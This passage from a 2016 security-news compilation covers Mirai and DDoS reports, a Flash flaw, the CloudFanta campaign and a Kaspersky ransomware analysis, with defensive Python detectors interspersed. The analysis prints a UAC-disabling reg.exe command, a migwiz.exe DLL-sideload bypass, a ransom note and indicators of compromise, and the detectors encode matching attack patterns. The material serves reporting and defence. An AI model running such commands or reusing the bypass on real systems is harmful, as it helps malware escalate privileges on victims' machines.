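    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+) .*?\bSYN\b"
)

# Constructed sample: one source sweeping four hosts, one single login attempt,
# one HTTP SYN, and one ACK (not a connection attempt) that must be ignored.
SAMPLE_LOG = """\
Oct 27 10:00:01 gw kernel: [FW-IN] IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.21 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40001 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Oct 27 10:00:01 gw kernel: [FW-IN] IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.22 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40002 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Oct 27 10:00:02 gw kernel: [FW-IN] IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.23 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40003 DPT=2323 WINDOW=14600 RES=0x00 SYN URGP=0
Oct 27 10:00:02 gw kernel: [FW-IN] IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.24 LEN=40 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40004 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
Oct 27 10:00:03 gw kernel: [FW-IN] IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.21 LEN=40 TOS=0x00 PREC=0x00 TTL=60 ID=0 DF PROTO=TCP SPT=51000 DPT=23 WINDOW=29200 RES=0x00 SYN URGP=0
Oct 27 10:00:04 gw kernel: [FW-IN] IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.21 LEN=40 TOS=0x00 PREC=0x00 TTL=60 ID=0 DF PROTO=TCP SPT=51001 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0
Oct 27 10:00:05 gw kernel: [FW-IN] IN=eth0 OUT= SRC=203.0.113.9 DST=192.0.2.21 LEN=52 TOS=0x00 PREC=0x00 TTL=52 ID=0 DF PROTO=TCP SPT=40001 DPT=23 WINDOW=14600 RES=0x00 ACK URGP=0
"""


def telnet_targets(lines):
    """Map each source to the set of distinct destinations it SYN-probed on a
    telnet port. Non-SYN packets and other ports are ignored."""
    targets = defaultdict(set)
    for line in lines:
        m = SYN_RE.search(line)
        if m and int(m["dpt"]) in TELNET_PORTS:
            targets[m["src"]].add(m["dst"])
    return targets


def scanners(lines, min_targets=3):
    """Sources that probed at least min_targets distinct hosts, i.e. a sweep
    rather than a single login attempt. Returns {source: distinct target count}."""
    return {src: len(d) for src, d in telnet_targets(lines).items() if len(d) >= min_targets}


if __name__ == "__main__":
    for src, count in scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: telnet SYNs to {count} distinct hosts")
```

Counting distinct destinations rather than raw packets is what separates a sweep from a single user who mistyped a password; the same logic applied to outbound traffic from the LAN side finds an already-infected camera or DVR that has started scanning on the botnet's behalf.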
A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in its Friday's Distributed Denial of Service attacks.
However, after an initial analysis of the junk traffic, just yesterday, the company revealed that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware.
Earlier, the company believed that "tens of millions" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number turned out to be much smaller, leaving all of us wondering:
How did the Attack Succeed to this Massive Level?
To this, Hilton said that the Domain Name System protocol itself can amplify requests from legitimate sources.
"For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses," Hilton said. "When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume."
"It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be."
Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to Millions of people worldwide for several hours.
Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date.
According to the company, this attack has opened up an important debate about Internet security and volatility.
"Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet," Hilton said.
Next DDoS Attack could reach Tens Of Terabits-Per-Second
If IoT security is not taken seriously, future DDoS attacks could reach tens of terabits per second, as estimated by network security firm Corero.
The DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size, following a discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday.
According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power.
Dave Larson of Corero explains:
"LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network."
You can read more on Corero's official website.
How to Protect your Smart Device from being Hacked
1. Change Default Passwords of your connected devices: If you have any internet-connected device at home or work, change its credentials if it still uses the default ones. Keep in mind that the Mirai malware scans for default credentials.
2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network.
Check for "Universal Plug and Play" features and turn them OFF.
3. Disable Remote Management through Telnet: Go into your router's settings and disable remote management, specifically through Telnet, a protocol that lets one computer control another from a remote location. It has also been used in previous Mirai attacks.
4. Check for Software Updates and Patches: Last but not least, always keep your connected devices and routers up to date with the latest vendor firmware.
Check if your IoT device is vulnerable to Mirai malware
There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware.
If it detects any, contact the device's manufacturer or look out for a solution to patch those vulnerable gaps.
The tool makes use of the search engine Shodan to find unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers.
LinkedIn to get Banned in Russia for not Complying with Data Localization Law
27.10.2016 thehackernews Social
The world's largest online professional network LinkedIn could face a ban in Russia after the company has failed to comply with a Russian data localization law that compels companies to keep data on Russian users in their country.
If you are not aware, LinkedIn is the only major social network which is not banned in China, because the company agreed to cooperate with the Chinese government and remove controversial content.
However, LinkedIn could be the first social network in Russia to be blocked by the Russian state's federal media regulator, called Roskomnadzor, for not complying with the rules.
In July 2014, Russia approved amendments to the Russian Personal Data Law, which came into force on 1 September 2015; under them, foreign tech companies are required to store the personal data of Russian citizens within the country.
However, Russia was not the first country to enforce such a law on foreign tech companies. A few months ago, Iran also imposed new regulations requiring all foreign messaging and social media apps to move 'data and activity' associated with Iranian citizens onto servers in Iran within one year.
The law was in an attempt to protect its citizen's data from the NSA's mass surveillance revealed by whistleblower Edward Snowden.
Big technology companies, such as Google, Apple, and Viber, have reportedly already moved some of their servers to Russia this year.
However, companies like Facebook, Microsoft and Twitter declined to comply with the law. The Russian Internet watchdog Roskomnadzor has targeted LinkedIn in its first attempt to pressure foreign companies into complying with its new privacy law.
Roskomnadzor has chosen LinkedIn as its first target due to the company's history of security problems. The massive 2012 hack of LinkedIn exposed over 117 million passwords and usernames.
"They have a bad track record: Every year there’s a major scandal about the safety of user data," Roskomnadzor spokesman Vadim Ampelonskiy told the Moscow Times.
Roskomnadzor said that not only has LinkedIn refused to move its servers to Russia, but the company also collects and sends data about Russian citizens who are not even users of the social network, without their consent.
"We are seeking a court order to block LinkedIn. We twice sent requests in the summer, but they did not provide answers to our questions," Ampelonskiy told the TASS news agency.
Moscow's Tagansky District Court has also ruled in favor of Roskomnadzor, though LinkedIn has appealed to a higher court to overturn the ban. The Moscow City Court will announce its decision on November 10.
The watchdog says it will lift the ban if the social networking company provides information showing that it has complied with the law and moved its servers holding data about Russians to their country.
Roskomnadzor – also known as the Federal Service for Supervision in the Sphere of Telecom, Information Technologies, and Mass Communications – is Russia's telecoms watchdog that runs a huge blacklist of websites banned in Russia.
Massive DDoS attacks caused broadband outages to StarHub customers
27.10.2016 securityaffairs Attack
Massive DDoS attacks caused broadband outages to StarHub customers; it is the first time that Singapore has experienced such an attack on its infrastructure.
StarHub in Singapore is the latest victim of a massive DDoS attack, powered by compromised IoT devices, against its DNS infrastructure.
It seems that the attackers used equipment owned by StarHub's own customers; the company mitigated the attacks by filtering the malicious traffic and increasing its DNS capacity.
“StarHub Confirms Cause of Home Broadband Incidents on 22 October and 24 October 2016
Singapore, 25 October 2016 – We have completed inspecting and analyzing network logs from the home broadband incidents on 22 October and 24 October and we are now able to confirm that we had experienced intentional and likely malicious distributed denial-of-service (DDoS) attacks on our Domain Name Servers (DNS). These caused temporary web connection issue for some of our home broadband customers.” reads a message published on Facebook by the company.
“On both occasions, we mitigated the attacks by filtering unwanted traffic and increasing our DNS capacity and restored service within two hours.”
The DNS server of the company was hit by a huge volume of traffic that knocked some home broadband customers offline.
The company has no doubts about the malicious nature of the DDoS attack that reached a magnitude and a level of sophistication never experienced before by StarHub.
“These two recent attacks that we experienced were unprecedented in scale, nature and complexity. We would like to thank our customers for their patience as we took time to fully understand these unique situations and to mitigate them effectively”, reads StarHub.
In the message shared by the company there is no explicit reference to the Mirai botnet, but StarHub representatives speaking to The Straits Times speculated that the attack was powered by customers' infected webcams and routers.
The company is inviting its customers to use only IoT devices from reputable vendors and to adopt a proper security posture when dealing with connected objects. The company has already started a campaign to sanitize the equipment used by its customers.
Singapore’s Cyber Security Agency and the Infocomm Media Development Authority issued a notice to all Internet service providers and telco companies to improve the level of cyber security following two cyber attacks on StarHub.
“This is the first time that Singapore has experienced such an attack on its telco infrastructure,” reads the joint notice.
“Given the increasing connectedness of digital systems, there is no fool-proof solution. It takes a collective effort from companies and society to bolster our cyber resilience,” according to a joint statement late Wednesday.
CVE-2016-7855 flaw in Adobe Flash Player exploited in targeted attacks
27.10.2016 securityaffairs Vulnerability
Adobe has issued a security patch for its Flash Player that fixes a critical vulnerability, tracked as CVE-2016-7855, used in targeted attacks.
Adobe has released a security update for its Flash Player that addresses a critical vulnerability, tracked as CVE-2016-7855, that has been exploited in the wild by threat actors.
According to the security advisory issued by Adobe, CVE-2016-7855 has been exploited in targeted attacks. The vulnerability is a use-after-free issue that attackers can trigger to achieve arbitrary code execution.
“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical vulnerability that could potentially allow an attacker to take control of the affected system.” states the summary published by Adobe.
“Adobe is aware of a report that an exploit for CVE-2016-7855 exists in the wild, and is being used in limited, targeted attacks against users running Windows versions 7, 8.1 and 10.”
The CVE-2016-7855 flaw affects Flash Player 23.0.0.185 and earlier for Windows, Macintosh, Linux and Chrome OS, and 11.2.202.637 and earlier for Linux.
The vulnerability was discovered by the researchers Neel Mehta and Billy Leonard from the Google Threat Analysis Group.
The researchers confirmed the exploitation of the CVE-2016-7855 vulnerability in a small number of targeted attacks against users running Windows 7, 8.1 and 10.
Security researchers at Adobe suspect that a sophisticated threat actor is behind the targeted attacks that exploited the issue.
Adobe has issued Flash Player 23.0.0.205 and 11.2.202.643 (Linux) to fix the flaw.
Both Microsoft and Google are also expected to address the vulnerability by issuing updates for Chrome, Edge, and Internet Explorer 11.
Adobe software continues to be a privileged target for hackers: zero-day and other security vulnerabilities affecting the company's products have been exploited in numerous attacks in the wild.
CloudFanta Malware Steals Banking Information Via Cloud Storage Apps
27.10.2016 securityaffairs Virus
Watch out: Netskope Threat Research Labs spotted the CloudFanta malware stealing banking information via cloud storage apps.
Netskope Threat Research Labs published detailed research on the "CloudFanta" malware campaign, suspected of having stolen more than 26,000 sets of email credentials since July 2016. CloudFanta abuses SugarSync, a cloud storage app, to distribute itself, steal user credentials and monitor online banking activity in order to extract sensitive information.
CloudFanta attacks its victims through an attachment link in a spear-phishing email. It lures the victim into clicking the provided link or executing a file. According to the experts at Netskope, the malware was spread through the SugarSync URL "https://www[.]sugarsync[.]com/pf/D3202366_07280196_66523?directDownload=true".
The downloaded zip archive "NF-9944132-br.zip" contained a downloader JAR file "NF-9944132-br.PDF.jar" with the dual extension ".PDF.jar". The files retrieved by this downloader JAR are detected by Netskope Threat Protection as "Backdoor.Generckd.3549404, Backdoor.Generckd.3540808, Backdoor.Generckd.18673650, Backdoor.Generckd.3542220 and Gen:Variant.Symm.60013."
The Netskope research suggests that users are primarily targeted by a link in a spear-phishing email, which lures them into downloading a zip file containing a file with the dual extension ".PDF.JAR" to fool the victim. When the victim opens the JAR file, it silently downloads DLL (Dynamic Link Library) files in the background to C:\users\public.
The CloudFanta malware goes undetected by network security devices such as firewalls and intrusion detection systems because it downloads the DLL files under a fake ".PNG" extension and uses SSL/HTTPS communication. These DLL files are then renamed with the hostname and the extension ".TWERK".
Ravi Balupari, director of engineering and cloud security research at Netskope, explains: "This malware campaign looks for the users' email addresses and passwords," he says. "It's also targeting specific users." The primary target of CloudFanta is currently Brazil.
How does this malware work? When victims enter their login credentials on an infected machine, the sign-in page redirects to a phishing sign-in page so that their credentials can be stolen. When they enter their credentials, the data is uploaded to the C&C server, and they are then redirected back to the original sign-in page. Balupari explains that the malware also bypasses the security measure of virtual keyboards, as most banks offer sign-in through a virtual keyboard.
When victims try to access their accounts, the malware takes a snapshot of every single click. It then saves a text file recording the mouse clicks, which lets attackers recover the victim's passwords later.
SugarSync isn't the only software application abused by CloudFanta; the malware also used Dropbox to host malicious files. The ability to download files automatically and SugarSync's broad user base made it easier for the malware to spread.
Traditional malware relied on attacker-controlled servers to host files; with the cloud, attackers conveniently gain broader reach, spread cloud-based malware quickly, and can access it from anywhere.
Balupari explains, “Typically, cloud-based apps provide a convenient method for downloading files.”
Netskope has joined hands with Sugarsync to stop the malware from spreading by taking down infected URLs. The collaboration is to provide information on malicious links and monitor CloudFanta changes in other malware campaigns.
Balupari said, “We’ll definitely see a rise in cloud malware campaigns going forward,” he further said, “Enterprises and customers who have been adopting cloud apps need to add additional layers of security.”
There are various steps businesses and individuals can take to prevent cloud malware from reaching their sensitive information: for example, a policy to block executable files served with the type "image/png", end-to-end encryption software, enabling the display of known file extensions in Windows Explorer, two-factor authentication, Virtual Private Network (VPN) software, updated antivirus, and keeping systems up to date.
IT pros should also make it a practice to keep track of and detect unauthorized cloud services, and to enforce policies on data loss prevention, management of data entry, and backup of sensitive data stored in the cloud.
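The two masquerading tricks described above (a decoy dual extension on the downloader and DLLs fetched under a ".PNG" name) can be caught by checking content against the name and declared type rather than trusting either. The following Python is an added example, not Netskope's tooling; the decoy and executable extension sets and all sample bytes are constructed assumptions.

```python
"""Spot the two file-masquerading tricks attributed to CloudFanta: a downloader
named with a decoy dual extension (.PDF.jar) and DLLs fetched under a .PNG
extension. Added example; all sample bytes below are constructed."""
import io
import zipfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PE_MAGIC = b"MZ"            # DOS header that starts every Windows EXE/DLL
ZIP_MAGIC = b"PK\x03\x04"   # a JAR is a ZIP archive

DECOY_EXTS = {"pdf", "doc", "docx", "png", "jpg", "txt"}   # assumed decoy set
EXEC_EXTS = {"jar", "exe", "dll", "scr", "js", "vbs"}       # assumed executable set


def sniff_type(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring the file name entirely."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def is_jar(data: bytes) -> bool:
    """A JAR is a ZIP carrying a manifest and/or Java class files."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    return any(n.upper() == "META-INF/MANIFEST.MF" or n.endswith(".class") for n in names)


def has_dual_extension(filename: str) -> bool:
    """True for names like NF-9944132-br.PDF.jar: a decoy document extension
    immediately followed by an executable extension."""
    parts = filename.lower().split(".")
    return len(parts) >= 3 and parts[-2] in DECOY_EXTS and parts[-1] in EXEC_EXTS


def classify(filename: str, data: bytes, declared_mime: str = "") -> list:
    """Return the masquerading indicators found; an empty list means nothing suspicious."""
    findings = []
    kind = sniff_type(data)
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    if has_dual_extension(filename):
        findings.append("dual extension: decoy document extension hides an executable one")
    if ext == "png" and kind != "png":
        findings.append(f".png name but content sniffs as {kind}")
    if declared_mime == "image/png" and kind != "png":
        findings.append(f"declared image/png but content sniffs as {kind}")
    if kind == "pe":
        findings.append("Windows PE executable/DLL content")
    if kind == "zip" and is_jar(data):
        findings.append("Java archive content (executes if opened with a JRE)")
    return findings


def _build_jar() -> bytes:
    """Constructed minimal JAR: a manifest plus an empty class entry, no real code."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n")
        zf.writestr("Loader.class", b"")
    return buf.getvalue()


# Constructed samples mirroring the campaign's tricks (no real malware bytes)
SAMPLE_JAR = _build_jar()
SAMPLE_FAKE_PNG_DLL = PE_MAGIC + b"\x90" * 62
SAMPLE_REAL_PNG = PNG_MAGIC + b"\x00" * 16

if __name__ == "__main__":
    for name, data, mime in [
        ("NF-9944132-br.PDF.jar", SAMPLE_JAR, "application/octet-stream"),
        ("module1.png", SAMPLE_FAKE_PNG_DLL, "image/png"),
        ("logo.png", SAMPLE_REAL_PNG, "image/png"),
    ]:
        print(f"{name}: {classify(name, data, mime) or 'clean'}")
```

The same check belongs at a proxy or CASB policy point, where the declared "image/png" type of an HTTPS download can be compared with the sniffed content after inspection.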
Experts disclosed a critical flaw in Schneider Industrial Firewalls
27.10.2016 securityaffairs Vulnerability
CyberX experts at the SecurityWeek’s 2016 ICS Cyber Security Conference disclosed a critical flaw in the Schneider Industrial Firewalls.
This week, at the SecurityWeek’s 2016 ICS Cyber Security Conference, researchers at industrial security firm CyberX disclosed several important vulnerabilities.
The experts demonstrated how hackers can target ICS systems and bypass the security measures in place.
Among the vulnerabilities disclosed by the experts, there is a flaw affecting a Schneider Electric industrial firewall that could be exploited by hackers for remote code execution.
The vulnerability affects products in Schneider Electric's ConneXium TCSEFEC family of industrial Ethernet firewalls. This family of products is used in industrial contexts to protect SCADA systems, automation systems, industrial networks and other systems.
The experts discovered that the web-based administration interface of the Schneider Electric’s ConneXium TCSEFEC firewalls is affected by a buffer overflow. The exploitation of the flaw could allow attackers to execute arbitrary code.
The researchers also reported the flaw to the US ICS-CERT, which is expected to issue a security advisory.
A threat actor could exploit the flaw to change firewall rules, eavesdrop on traffic, inject malicious traffic, and disrupt communications.
The researchers highlighted that the flaw is exploitable even by attackers without specific technical skills.
“Exploitation of this security hole could also lead to manipulation of control systems, which, in a worst case scenario, could result in physical damage. Programmable logic controllers (PLCs) typically don’t have any type of authentication, allowing attackers to easily gain access and exploit known or zero-day flaws.” reported Eduard Kovacs from Security Week.
Unfortunately, it is quite easy for attackers to target Schneider industrial firewalls, which are easy to find through search engines such as Shodan or Censys.
According to CyberX, the vendor Schneider Electric has already developed a security update to address the vulnerability, but has not yet released it.
The researchers from CyberX also reported seven zero-day flaws in PLC systems from a major unnamed vendor that is already working on a security update to fix them.
The “notification” ransomware lands in Brazil
26.10.2016 Kaspersky Virus
It’s unusual for a day to go by without finding some new variant of a known ransomware, or, what is even more interesting, a completely new one. Unlike the previously reported and now decrypted Xpan ransomware, this same-but-different threat from Brazil has recently been spotted in the wild. This time the infection vector is not a targeted remote desktop intrusion, but a more massively propagated malicious campaign relying on traditional spam email.
Since the infection is not done manually by the bad guys, their malware has a higher chance of being detected, and we believe that is one of the reasons they added one more level of protection to the code, resorting to a binary dropper to launch the malicious payload.
Given that this particular ransomware is fairly well known by now, instead of opting for the usual branding and marketing efforts in which most ransomware authors invest time, this group has decided to choose an unnamed campaign, showing only an email address for technical support and a bitcoin address for making the payment. It has become a kind of urban legend that if you can’t find something on Google, then it doesn’t exist.
Not very long ago, we saw the birth of truly autochthonous Brazilian ransomware, without much technical sophistication and mainly based on an open-source project. While there’s a long road ahead for local bad guys to achieve the level of the key players on the ransomware scene, this particular family is interesting to study since there have been versions in English, Italian, and now Brazilian Portuguese. Is this ransomware being sold as a commodity in underground forums with Brazilian crews just standing on the shoulders of giants? Or is this a regional operation just starting out?
As one of the very few ransomware variants that prepend a custom ‘Lock.’ extension to the encrypted files instead of appending it, the task of recognizing this malware is not particularly difficult. However, understanding its true origins could still be considered an ongoing debate.
The drop
If we trust that the first transaction corresponds to the very first victim, the campaign has probably been active since 2016-04-04 17:29:26 (April 4th, 2016). In reality, this is not exactly accurate. The timestamp of the original dropper shows that the sample was actually compiled at the beginning of October:
That would mean that the criminal behind the campaign might have run different ransomware campaigns in the past, or is just using the same BTC wallet for other criminal deeds as well.
The dropper is protected by the popular .NET obfuscator SmartAssembly, as can be seen from the string "Powered by SmartAssembly 6.9.0.114". Once executed, it tries to mask itself in an Alternate Data Stream of the NTFS file system on Windows:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Sims.exe:Zone.Identifier
It is capable of disabling Windows LUA protection:
“HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM”; Key: “ENABLELUA”; Value: “00000000”
(cmd.exe /c %WINDIR%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f)
The mechanism used to write new information to the registry is quite unusual: it uses the official Windows application 'migwiz.exe' to bypass the UAC prompt, so no action from the user is needed to execute with elevated privileges.
The malware achieves this by writing a library 'cryptbase.dll' to the same folder as the 'migwiz.exe' file. As soon as migwiz.exe is launched, the process loads this library, which contains a WinExec call that launches the command line provided as a parameter.
The reason they use MigWiz is that this process is on Microsoft's auto-elevate list, meaning it can be elevated without asking for explicit permission.
As a simple means of information gathering, the dropper reads the name of the infected computer:
“HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME”; Key: “COMPUTERNAME”
Moreover, it includes data-stealing techniques, such as retrieving information from the clipboard or capturing it as it is typed on the keyboard. Additionally, it has the capability to reboot the user's machine, for which it requests the shutdown privilege:
@4333be: push ebp
@4333bf: mov ebp, esp
@4333c1: sub esp, 14h
@4333c4: push ebx
@4333c5: mov ebx, dword ptr [ebp+08h]
@4333c8: lea eax, dword ptr [ebp-04h]
@4333cb: push eax
@4333cc: push 00000028h
@4333ce: call dword ptr [00482310h] ;GetCurrentProcess@KERNEL32.DLL
@4333d4: push eax
@4333d5: call dword ptr [0048202Ch] ;OpenProcessToken@ADVAPI32.DLL
@4333db: test eax, eax
@4333dd: je 0043341Eh
@4333df: lea ecx, dword ptr [ebp-10h]
@4333e2: push ecx
@4333e3: push 00487D68h ;SeShutdownPrivilege
Finally, it drops and executes the file tmp.exe (corresponding hash B4FDC93E0C089F6B885FFC13024E4B9).
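Each step of the dropper's chain described above (the Zone.Identifier stream under the Startup folder, cryptbase.dll written beside migwiz.exe, migwiz.exe launched by an unprivileged parent, EnableLUA forced to 0, and files renamed with the prepended 'Lock.' extension) leaves telemetry that endpoint monitoring can match. The following Python is an added example, not part of the Kaspersky analysis: it runs simple rules over constructed Sysmon-style events, and the event shape, the C:\Windows paths and the three-file burst threshold are assumptions.

```python
"""Detection rules for the dropper behaviours described above, run over
constructed Sysmon-style events. Added example; event shape, paths and the
'three Lock.-prefixed files' threshold are assumptions, not Kaspersky data."""
import ntpath
import re
from collections import Counter

# matches: reg.exe ADD ...\Policies\System /v EnableLUA /t REG_DWORD /d 0
ENABLELUA_OFF = re.compile(
    r"policies\\system\s+/v\s+enablelua\s+/t\s+reg_dword\s+/d\s+0\b", re.IGNORECASE)
WINDOWS_DIR = "c:\\windows\\"
LOCK_BURST = 3   # assumed threshold for flagging mass 'Lock.' renames


def _under_windows(path: str) -> bool:
    return path.lower().startswith(WINDOWS_DIR)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: list) -> list:
    """Return 'RULE: detail' alerts; each rule maps to one behaviour in the analysis."""
    alerts = []
    locked = Counter()   # files given the prepended 'Lock.' name, per writing process
    for ev in events:
        img, low = ev.get("image", ""), ev.get("target", "").lower()
        if ev["type"] == "process":
            parent = ev.get("parent", "")
            if ENABLELUA_OFF.search(ev.get("cmdline", "")):
                alerts.append(f"UAC_DISABLED: EnableLUA=0 via {_name(img)}, parent {_name(parent)}")
            if _name(img) == "migwiz.exe" and not _under_windows(parent):
                alerts.append(f"AUTOELEVATE_ABUSE: migwiz.exe launched by {_name(parent)}")
            if "\\start menu\\programs\\startup\\" in img.lower():
                alerts.append(f"STARTUP_PERSISTENCE: {_name(img)} running from Startup folder")
        elif ev["type"] == "file":
            if _name(low) == "cryptbase.dll" and not _under_windows(img):
                alerts.append(f"DLL_SIDELOAD_DROP: cryptbase.dll written to "
                              f"{ntpath.dirname(ev['target'])} by {_name(img)}")
            if ":zone.identifier" in low and "\\startup\\" in low:
                alerts.append(f"ADS_IN_STARTUP: {ev['target']}")
            if _name(low).startswith("lock."):
                locked[img] += 1
        elif ev["type"] == "registry":
            if low.endswith("\\policies\\system\\enablelua") and ev.get("value") == 0:
                alerts.append(f"UAC_REGISTRY: EnableLUA set to 0 by {_name(img)}")
    for img, n in locked.items():
        if n >= LOCK_BURST:
            alerts.append(f"RANSOM_RENAME_BURST: {_name(img)} wrote {n} 'Lock.'-prefixed files")
    return alerts


STARTUP = r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
MIGWIZ = r"C:\Windows\System32\migwiz"   # assumed location of migwiz.exe
TMP = r"C:\Users\bob\AppData\Local\Temp\tmp.exe"

# Constructed event sequence shaped like the infection chain (not real telemetry)
EVENTS = [
    {"type": "file", "image": r"C:\Users\bob\Downloads\04.exe",
     "target": STARTUP + r"\Sims.exe:Zone.Identifier"},
    {"type": "process", "image": STARTUP + r"\Sims.exe",
     "parent": r"C:\Users\bob\Downloads\04.exe", "cmdline": "Sims.exe"},
    {"type": "file", "image": STARTUP + r"\Sims.exe", "target": MIGWIZ + r"\cryptbase.dll"},
    {"type": "process", "image": MIGWIZ + r"\migwiz.exe",
     "parent": STARTUP + r"\Sims.exe", "cmdline": "migwiz.exe"},
    {"type": "process", "image": r"C:\Windows\System32\reg.exe", "parent": MIGWIZ + r"\migwiz.exe",
     "cmdline": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
                r" /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"type": "registry", "image": r"C:\Windows\System32\reg.exe", "value": 0,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"},
    {"type": "file", "image": TMP, "target": r"C:\Users\bob\Documents\Lock.budget.xlsx"},
    {"type": "file", "image": TMP, "target": r"C:\Users\bob\Documents\Lock.thesis.docx"},
    {"type": "file", "image": TMP, "target": r"C:\Users\bob\Pictures\Lock.holiday.jpg"},
    {"type": "file", "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "target": r"C:\Users\bob\Documents\notes.docx"},   # benign activity, must not alert
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```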
Hello sir, hello madam, your files have been locked
After the infection has been completed, as is usual in all ransomware families, the ransom note is shown. This time, it is written in Brazilian Portuguese and demanding 2000 BRL, which equates to around 627 USD or 1 BTC at the time of writing.
The bitcoin address provided for payment (1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4) shows total deposits of 1.89 BTC, although many transactions have been made since the creation of this wallet. This leads us to believe that either the criminal has been using the wallet for other purposes, or they have been bargaining with the victims and offering them a lower price, as suggested by the amount in each transaction.
The ransom note is very succinct, without giving any special payment URL or any other type of information. The victim will have to learn about bitcoin payments the hard way, and should they need support they can reach the criminals through a single email point of contact.
NOTICE
Hello Sir/Madam,
ALL of your files have been LOCKED and will only be UNLOCKED
if you pay an amount of R$ 2,000.00 (two thousand reais) in Bitcoins.
After paying this amount, just send me a screenshot to the email
infomacaoh@gmail.com
and I will send you the program with the password to decrypt/unlock your files.
If the payment is not made, all of your data will be locked
permanently and your computer will be completely formatted
(thereby losing all the information on it, including email and banking passwords...)
The payment must be made to this Bitcoin address:
1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4
To convert your balance into bitcoins, visit the site:
https://www.mercadobitcoin.com.br/conta/register/
Growth of ransomware in Brazil
The growth of ransomware in Brazil has been nothing short of impressive: during October 2016 alone, the popular ransomware family Packed.NSIS.MyxaH.gen grew by 287.96%, and another of the usual suspects, Trojan-Ransom.Win32.CryptXXX.gen, grew by 56.96% (each compared to the previous month).
In 2016, the three most important ransomware families have been Trojan-Ransom.Win32.Blocker, accounting for 49.63% of total infections, Trojan-Ransom.NSIS.Onion with 29.09%, and Trojan-Ransom.Win32.Locky with 3.99%.
Currently, Brazil is the eighth most affected country worldwide as far as ransomware infections go for this year, and ranked first in Latin America.
Indicators of compromise
File: 04.exe
Size: 1049600
MD5: 86C85BD08DFAC63DF65EAEAE82ED14F7
Compiled: Saturday, October 8 2016, 11:22:30 – 32 Bit .NET
File: tmp.exe
Size: 842220
MD5: BB4FDC93E0C089F6B885FFC13024E4B9
Compiled: Sunday, January 29 2012, 21:32:28 – 32 Bit
Hacking Firmware from Mobile Phone Hacking Company Leaked Online
26.10.2016 thehackernews Mobile
